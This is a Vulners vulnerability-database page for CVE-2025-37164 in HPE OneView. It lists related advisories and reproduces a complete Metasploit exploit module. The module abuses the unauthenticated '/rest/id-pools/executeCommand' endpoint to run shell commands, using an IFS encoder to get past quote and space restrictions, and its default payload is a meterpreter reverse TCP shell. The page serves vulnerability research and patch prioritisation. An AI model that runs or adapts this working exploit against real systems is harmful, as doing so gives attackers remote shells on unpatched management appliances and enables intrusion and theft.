Vulners
Lucene search
HPE OneView unauthenticated RCE
🗓️ 20 Dec 2025 18:55:10Reported by Nguyen Quoc Khanh, remmons-r7, sfewer-r7Type 
metasploit🔗 www.rapid7.com👁 403 Views
| Reporter | Title | Published | Views | Family All 28 |
|---|---|---|---|---|
 | Exploit for CVE-2025-37164 | 18 Dec 202513:41 | – | githubexploit |
| Exploit for CVE-2025-37164 | 19 Dec 202522:00 | – | githubexploit |
| Exploit for Code Injection in Hpe Oneview | 6 Jan 202622:23 | – | githubexploit |
 | CVE-2025-37164 | 16 Dec 202516:55 | – | circl |
 | Hewlett Packard Enterprise (HPE) OneView Code Injection Vulnerability | 7 Jan 202600:00 | – | cisa_kev |
 | CISA Adds Two Known Exploited Vulnerabilities to Catalog | 7 Jan 202612:00 | – | cisa |
 | HPE OneView 安全漏洞 | 16 Dec 202500:00 | – | cnnvd |
 | CVE-2025-37164 | 16 Dec 202516:30 | – | cve |
 | CVE-2025-37164 | 16 Dec 202516:30 | – | cvelist |
 | EUVD-2025-203803 | 16 Dec 202516:30 | – | euvd |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
prepend Msf::Exploit::Remote::AutoCheck
def initialize(info = {})
super(
update_info(
info,
'Name' => 'HPE OneView unauthenticated RCE',
'Description' => %q{
This module exploits an unauthenticated RCE vulnerability, CVE-2025-37164, against Hewlett Packard Enterprise
(HPE) OneView. All versions below 11.00 are vulnerable (so long as the vendor supplied hotfix has not been
applied), however some VM product versions do not enable the vulnerable "ID Pools" endpoint, and are not
exploitable.
},
'License' => MSF_LICENSE,
'Author' => [
# Original finder
'Nguyen Quoc Khanh',
# Analysis and exploit
'remmons-r7',
'sfewer-r7'
],
'References' => [
['CVE', '2025-37164'],
# Vendor advisory
['URL', 'https://support.hpe.com/hpesc/public/docDisplay?docId=hpesbgn04985en_us&docLocale=en_US'],
# Rapid7 ETR blog
['URL', 'https://www.rapid7.com/blog/post/etr-cve-2025-37164-critical-unauthenticated-rce-affecting-hewlett-packard-enterprise-oneview/'],
# Rapid7 Analysis
['URL', 'https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis']
],
'DisclosureDate' => '2025-12-16',
'Privileged' => false, # Executes as trm3.
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD],
'Targets' => [
[
# Successfully tested with the following payloads against OneView 6.60.07:
# cmd/unix/reverse_ncat_ssl
# cmd/linux/http/x64/meterpreter_reverse_tcp
'Default', {
'Payload' => {
'BadChars' => '"\' ',
'Encoder' => 'cmd/ifs'
},
'DefaultOptions' => {
'PAYLOAD' => 'cmd/linux/http/x64/meterpreter_reverse_tcp'
}
}
],
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS]
}
)
)
register_options([OptString.new('TARGETURI', [true, 'Base path', '/'])])
end
def check
# We can pull out the current REST API version number and correlate it back to a major.minor product number
# based on known values. This is informational only, the check routine will leverage the vulnerability to
# identify if the target si actually vulnerable. This is due to the vulnerability not being present on
# some VM versions due to the ID Pool endpoints being disabled.
res_ver = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'rest', 'appliance', 'version')
)
return CheckCode::Unknown('Connection to /rest/appliance/version failed') unless res_ver
return CheckCode::Unknown("Unexpected /rest/appliance/version response code #{res_ver.code}") unless res_ver.code == 200
json_ver = JSON.parse(res_ver.body)
version_string = 'Detected '
version_string += json_ver['modelNumber'] || 'HPE OneView'
version_string += ' version '
version_string += json_ver['softwareVersion'] || 'unknown'
# We leverage the command execution vulnerability to execute a benign command. We test that this command executed
# successfully below. Note, we aren't checking the stdout, so we cannot do a proof-of-execution check like
# "echo $((1+2))" and then test for the result of "3".
cmd = "echo #{SecureRandom.uuid}"
res = execute_cmd(cmd, shell: false)
return CheckCode::Unknown("#{version_string}. Connection failed") unless res
# The vendor hotfix adds an HTTP rewrite rule to force the target endpoint as 404.
# Some Virtual Machine based product versions don't support ID Pools, so report 404 for the missing endpoint.
return CheckCode::Safe("#{version_string}. Target endpoint returned response code #{res.code}") if res.code == 404
return CheckCode::Unknown("#{version_string}. Unexpected response code #{res.code}") unless res.code == 200
j = JSON.parse(res.body)
return Exploit::CheckCode::Vulnerable(version_string) if (j['type'] == 'ExecutableCommand') && (j['cmd'] == cmd) && (j['result'] == true)
CheckCode::Unknown("#{version_string}. Unexpected JSON results")
rescue JSON::ParserError
return CheckCode::Unknown('Failed to parse JSON body')
end
def exploit
res = execute_cmd(payload.encoded, shell: true)
fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Connection failed') unless res
fail_with(Msf::Exploit::Failure::UnexpectedReply, "Unexpected response code: #{res.code}") unless res.code == 200
j = JSON.parse(res.body)
fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Response is not of type ExecutableCommand') if j['type'] != 'ExecutableCommand'
# If Runtime.getRuntime().exec succeeds, the "result" will be true. If an IOException was thrown, this is caught and
# the "result" will be false. So we can use this to see if our payload command executed successfully or not.
# We dont fail_with() but rather print_warning() in case the payload executed before the failure
# occurred (i.e. during cleanup).
if j['result'] == false
print_warning('Command execution returned a result of false, likely due to an unexpected IOException server-side')
end
rescue JSON::ParserError
fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Failed to parse JSON body')
end
def execute_cmd(cmd, shell:)
send_request_cgi(
'method' => 'PUT',
'uri' => normalize_uri(target_uri.path, 'rest', 'id-pools', 'executeCommand'),
'ctype' => 'application/json',
'data' => {
# As this is in JSON, we cannot have " or ' characters. We mark these as BadChars so Metasploit will use an
# encoder to avoid them. To shell out to /bin/sh -c we need to wrap the arguments in quotes. As we cannot do
# this, we also mark a white space as a BadChar, and use the IFS encoder to encode them. This lets us use
# arbitrary Metasploit command payloads successfully via an unquoted /bin/sh -c PAYLOAD
'cmd' => shell ? "sh -c #{cmd}" : cmd,
'result' => false
}.to_json
)
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Jun 2026 19:04Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8 - 10
EPSS0.78572
SSVC